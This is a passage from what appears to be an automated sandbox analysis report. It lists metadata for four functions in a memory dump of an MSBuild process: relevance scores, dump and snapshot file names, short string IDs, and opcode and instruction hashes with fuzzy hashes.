                                                • Instruction Fuzzy Hash: 55917D30E52209DFDB68DFA9D994B6E7BB2FF84700F208529D401AB354DB749C86CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E7140 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-390881366
                                                • Opcode ID: 629144d8f8ba874c30391c79b0d8d12a381c57b5410d3f3bd90323bd7bc0fd0c
                                                • Instruction ID: bc291001b866a743ac256ede7f6b4beca34ba8627c079777e919edeeab296df9
                                                • Opcode Fuzzy Hash: 629144d8f8ba874c30391c79b0d8d12a381c57b5410d3f3bd90323bd7bc0fd0c
                                                • Instruction Fuzzy Hash: 9BF15E34B01209DFDB58DF69D554A6EBBB2FF84300F248969D405AB3A8DB35EC46CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E8478 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q
                                                • API String ID: 0-2125118731
                                                • Opcode ID: 37c4a294992a166053c088fe10391848a6e8065029789a36b06f395a9925e489
                                                • Instruction ID: 74e3ffaf97dd6630b5c0f9a460d1a1e6045edaffa8a51b187ffd8e631028e4a1
                                                • Opcode Fuzzy Hash: 37c4a294992a166053c088fe10391848a6e8065029789a36b06f395a9925e489
                                                • Instruction Fuzzy Hash: BFB14A30A12219DFDB64DF69D9946AEBBB2EF84300F24886DD405AB354DB34DC86CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E8890 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q$LR^q$$^q$$^q
                                                • API String ID: 0-2454687669
                                                • Opcode ID: c4a403558f6000bc4eab78ed3ee2768eda2f0dc0140895ca66ed788f12f8fe71
                                                • Instruction ID: a7212c564bae5111bbf782031dfcf4a33bbf7fc650dcf9e7cbbd5dc16ce935f3
                                                • Opcode Fuzzy Hash: c4a403558f6000bc4eab78ed3ee2768eda2f0dc0140895ca66ed788f12f8fe71
                                                • Instruction Fuzzy Hash: C351D230B11205AFDB58DF38D990A6AB7E6FF88310F1085ADE4069B3A5DB34EC45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EAD60 Relevance: 5.2, Strings: 4, Instructions: 162COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q
                                                • API String ID: 0-2125118731
                                                • Opcode ID: 15efefe30d5c44574e53b757fe080ef80b4847cab60a9865b8ac95db0e734d5e
                                                • Instruction ID: 44843ec00efbda44a8b68e502566888025219ba1570da73b4abbd26cddd5d6d2
                                                • Opcode Fuzzy Hash: 15efefe30d5c44574e53b757fe080ef80b4847cab60a9865b8ac95db0e734d5e
                                                • Instruction Fuzzy Hash: 56519034E126059FCF65DFA4D980AAEB7B2EF84301F24892AD405EB354DB35EC42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%